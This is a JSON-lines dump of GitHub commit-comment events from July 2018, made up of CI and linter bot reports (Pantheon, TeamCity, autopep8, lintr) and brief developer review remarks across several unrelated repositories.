{"id":"8038587112","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29889274,"position":null,"line":null,"path":null,"commit_id":"62e060d50c57668e9081bc4d62c9729ab95d7567","created_at":"2018-07-30T15:46:28Z","updated_at":"2018-07-30T15:46:28Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-454](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-454).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-454-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-30T15:46:28Z"}
{"id":"8038589272","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"ThomasKaiser/sbc-bench"},"payload":{"comment":{"id":29889282,"position":15,"line":284,"path":"sbc-bench.sh","commit_id":"057c72ebd8a4455d82f5f8c6b656bf603b9bd051","created_at":"2018-07-30T15:46:47Z","updated_at":"2018-07-30T15:46:47Z","author_association":"OWNER","body":"Thank you!"}},"created_at":"2018-07-30T15:46:47Z"}
{"id":"8038592654","type":"CommitCommentEvent","actor":{"login":"DoccyB"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29889295,"position":null,"line":null,"path":null,"commit_id":"07924a9b0ec83474d8dda97b26bb8f5bcaa64d44","created_at":"2018-07-30T15:47:19Z","updated_at":"2018-07-30T15:47:19Z","author_association":"OWNER","body":"On reading up on the \"select distinct\" statement, I now realise what you\nwere talking about earlier is what i've been searching for, and i'm\nregretting manually inputting all of this! I'll implement a dynamic read\nnow.\n\nOn 30 July 2018 at 16:31, Martin <notifications@github.com> wrote:\n\n> Are you planning to replace this with a dynamic read of the locations from\n> the database as a next step?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DoccyB/cycledata/commit/07924a9b0ec83474d8dda97b26bb8f5bcaa64d44#commitcomment-29889013>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AXIQ3P2HWd6MEQM3Xy4SDbSPXbN0K7tbks5uLya5gaJpZM4Vmore>\n> .\n>\n"}},"created_at":"2018-07-30T15:47:19Z"}
{"id":"8038593355","type":"CommitCommentEvent","actor":{"login":"yanggis"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29889297,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:47:27Z","updated_at":"2018-07-30T15:47:27Z","author_association":"OWNER","body":"看起来没有问题，你用的设么root工具呢？"}},"created_at":"2018-07-30T15:47:27Z"}
{"id":"8038593974","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/coala-quickstart"},"payload":{"comment":{"id":29889300,"position":null,"line":null,"path":null,"commit_id":"465d42117fbbf8e800af18353ea6524a1130673b","created_at":"2018-07-30T15:47:33Z","updated_at":"2018-07-30T15:47:33Z","author_association":"NONE","body":"Comment on 465d42117fbbf8e800af18353ea6524a1130673b.\n\nThere are 13 results for the section all.autopep8. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| The code does not comply to PEP8. | coala_quickstart/generation/Settings.py | 55 |\n| The code does not comply to PEP8. | coala_quickstart/generation/Settings.py | 61 |\n| The code does not comply to PEP8. | coala_quickstart/generation/Settings.py | 177 |\n| E305 expected 2 blank lines after class or function definition, found 1 | coala_quickstart/generation/Settings.py | 55 |\n| E227 missing whitespace around bitwise or shift operator | coala_quickstart/generation/Settings.py | 55 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 55 |\n| E113 unexpected indentation | coala_quickstart/generation/Settings.py | 56 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 61 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 61 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 61 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 62 |\n| E113 unexpected indentation | coala_quickstart/generation/Settings.py | 63 |\n| W292 no newline at end of file | coala_quickstart/generation/Settings.py | 177 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-30T15:47:33Z"}
{"id":"8038595670","type":"CommitCommentEvent","actor":{"login":"domwashburn"},"repo":{"name":"semantic-release/semantic-release"},"payload":{"comment":{"id":29889305,"position":126,"line":126,"path":"index.js","commit_id":"b4440fe0d38ceb972bdda9ccb24aafb78e8b3cef","created_at":"2018-07-30T15:47:50Z","updated_at":"2018-07-30T15:47:50Z","author_association":"NONE","body":"Likewise. I'm going to fork this for now so my team has a means of getting access to my quick update. I'm more than willing to help get this fix into the fold.\r\n\r\nAre you okay with PRs to this branch from a forked repo?"}},"created_at":"2018-07-30T15:47:50Z"}
{"id":"8038597305","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29889309,"position":null,"line":null,"path":null,"commit_id":"ce033af8f4259cfbe8521101fae6293bb218c3c8","created_at":"2018-07-30T15:48:07Z","updated_at":"2018-07-30T15:48:07Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-30T15:48:07Z"}
{"id":"8038598164","type":"CommitCommentEvent","actor":{"login":"junyingjy"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29889311,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:48:15Z","updated_at":"2018-07-30T15:48:15Z","author_association":"NONE","body":"机器原厂root了"}},"created_at":"2018-07-30T15:48:15Z"}
{"id":"8038600113","type":"CommitCommentEvent","actor":{"login":"elihart"},"repo":{"name":"airbnb/epoxy"},"payload":{"comment":{"id":29889316,"position":11,"line":60,"path":"kotlinsample/src/main/java/com/airbnb/epoxy/kotlinsample/ExampleKotlinModels.kt","commit_id":"0f521f07fb428b9f6f9efb98b6dbde3b21f48b0f","created_at":"2018-07-30T15:48:34Z","updated_at":"2018-07-30T15:48:34Z","author_association":"CONTRIBUTOR","body":"yeah, i didn't mean for this to stay in sync with the wiki. Good catch though, it would probably be a good idea to use `DoNotHash`. That' not completely necessary though, it's up to how the developer wants to use this, and they should understand why and when to use `DoNotHash`. \r\n\r\nIt's generally a good default though for callbacks"}},"created_at":"2018-07-30T15:48:34Z"}
{"id":"8038602064","type":"CommitCommentEvent","actor":{"login":"olegz"},"repo":{"name":"dsyer/spring-cloud-function"},"payload":{"comment":{"id":29889328,"position":161,"line":161,"path":"spring-cloud-function-webflux/src/main/java/org/springframework/cloud/function/web/flux/RequestProcessor.java","commit_id":"42966fc8ed271b8503861ca6f53ece2d0678506b","created_at":"2018-07-30T15:48:54Z","updated_at":"2018-07-30T15:48:54Z","author_association":"NONE","body":"Also, in StringConverter I still think the signature should be \r\n```\r\nObject convert(Class<?> type, String value);\r\n```\r\nand do `Class<?> type = inspector.getInputType(function);` right before calling it. "}},"created_at":"2018-07-30T15:48:54Z"}
{"id":"8038602443","type":"CommitCommentEvent","actor":{"login":"Sinakoba1"},"repo":{"name":"Sinakoba1/Sandwich-Shop"},"payload":{"comment":{"id":29889331,"position":null,"line":null,"path":null,"commit_id":"4212c41540905dc35bc93aad9ab6247f30e2c476","created_at":"2018-07-30T15:48:58Z","updated_at":"2018-07-30T15:48:58Z","author_association":"OWNER","body":"p"}},"created_at":"2018-07-30T15:48:58Z"}
{"id":"8038603708","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29889337,"position":null,"line":null,"path":null,"commit_id":"7fc18f6818071f0aedec66b72bb9c73e87ec39c7","created_at":"2018-07-30T15:49:11Z","updated_at":"2018-07-30T15:49:11Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-95](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-95).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-95-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-30T15:49:11Z"}
{"id":"8038606448","type":"CommitCommentEvent","actor":{"login":"arafalov"},"repo":{"name":"arafalov/solr-presentation-2018-may"},"payload":{"comment":{"id":29889341,"position":5,"line":5,"path":"configs/initial/solrconfig.xml","commit_id":"644bc5fb2da62b9bd70c6f4599dd55740c1ed2ec","created_at":"2018-07-30T15:49:37Z","updated_at":"2018-07-30T15:49:37Z","author_association":"OWNER","body":"I do not see that in ImplicitPlugins.json. If it were, I could move those definitions into request parameter. Actually, I should do that anyway. "}},"created_at":"2018-07-30T15:49:37Z"}
{"id":"8038608158","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29889348,"position":null,"line":null,"path":null,"commit_id":"57db7208658d9a730220c8e336777576361294ba","created_at":"2018-07-30T15:49:54Z","updated_at":"2018-07-30T15:49:54Z","author_association":"NONE","body":"[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:119:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/invoercontroleData_soortenKenmerken.R#L119) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:63:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/invoercontroleData_voorwaarden.R#L63) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:64:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/invoercontroleData_voorwaarden.R#L64) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekkingLaag.R:28:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_bedekkingLaag.R#L28) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>    \n^~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:475:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_1_databank.R#L475) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:476:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_1_databank.R#L476) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:28:3:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_berekenLSVIbasis.R#L28) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:29:3:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_berekenLSVIbasis.R#L29) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:575:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_berekenLSVIbasis.R#L575) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:576:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_berekenLSVIbasis.R#L576) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:24:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L24) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      mutate(  #idee is om onderstaande code te wissen zodra de databank/rekenmodule hiervoor aangepast is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:49:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>    \n^~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:58:6:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>    # \n     ^\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:59:7:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # save(Resultaat, file = \"inst/vbdata/Resultaat_test_bos.Rdata\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:60:7:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # load(\"inst/vbdata/Resultaat_test_bos.Rdata\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:61:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L61) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>    \n^~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/57db7208658d9a730220c8e336777576361294ba/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-30T15:49:54Z"}
{"id":"8038614814","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29889375,"position":null,"line":null,"path":null,"commit_id":"5c8c4358cf02ad2a087229df3fbd532476dc9576","created_at":"2018-07-30T15:50:58Z","updated_at":"2018-07-30T15:50:58Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 61](https://teamcity.otenv.com/viewLog.html?buildId=9031272&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) is now running\n"}},"created_at":"2018-07-30T15:50:58Z"}
{"id":"8038614890","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29889376,"position":null,"line":null,"path":null,"commit_id":"5c8c4358cf02ad2a087229df3fbd532476dc9576","created_at":"2018-07-30T15:50:58Z","updated_at":"2018-07-30T15:50:58Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 62](https://teamcity.otenv.com/viewLog.html?buildId=9031273&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) is now running\n"}},"created_at":"2018-07-30T15:50:58Z"}
{"id":"8038620585","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29889393,"position":null,"line":null,"path":null,"commit_id":"a7813b42b4f0c389b38a197c77583d612af93888","created_at":"2018-07-30T15:51:54Z","updated_at":"2018-07-30T15:51:54Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-119](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-119).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-119-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-30T15:51:54Z"}
{"id":"8038621154","type":"CommitCommentEvent","actor":{"login":"pvdlg"},"repo":{"name":"semantic-release/semantic-release"},"payload":{"comment":{"id":29889395,"position":126,"line":126,"path":"index.js","commit_id":"b4440fe0d38ceb972bdda9ccb24aafb78e8b3cef","created_at":"2018-07-30T15:52:00Z","updated_at":"2018-07-30T15:52:00Z","author_association":"MEMBER","body":"This branch is badly behind and I have to rebase it first.\r\nWe won't accept PR on that branch.\r\nIt will be ready when it's ready."}},"created_at":"2018-07-30T15:52:00Z"}
{"id":"8038621636","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29889398,"position":null,"line":null,"path":null,"commit_id":"5c8c4358cf02ad2a087229df3fbd532476dc9576","created_at":"2018-07-30T15:52:04Z","updated_at":"2018-07-30T15:52:04Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 61](https://teamcity.otenv.com/viewLog.html?buildId=9031272&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:06"}},"created_at":"2018-07-30T15:52:04Z"}
{"id":"8038622326","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29889403,"position":null,"line":null,"path":null,"commit_id":"5c8c4358cf02ad2a087229df3fbd532476dc9576","created_at":"2018-07-30T15:52:11Z","updated_at":"2018-07-30T15:52:11Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 62](https://teamcity.otenv.com/viewLog.html?buildId=9031273&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:12"}},"created_at":"2018-07-30T15:52:11Z"}
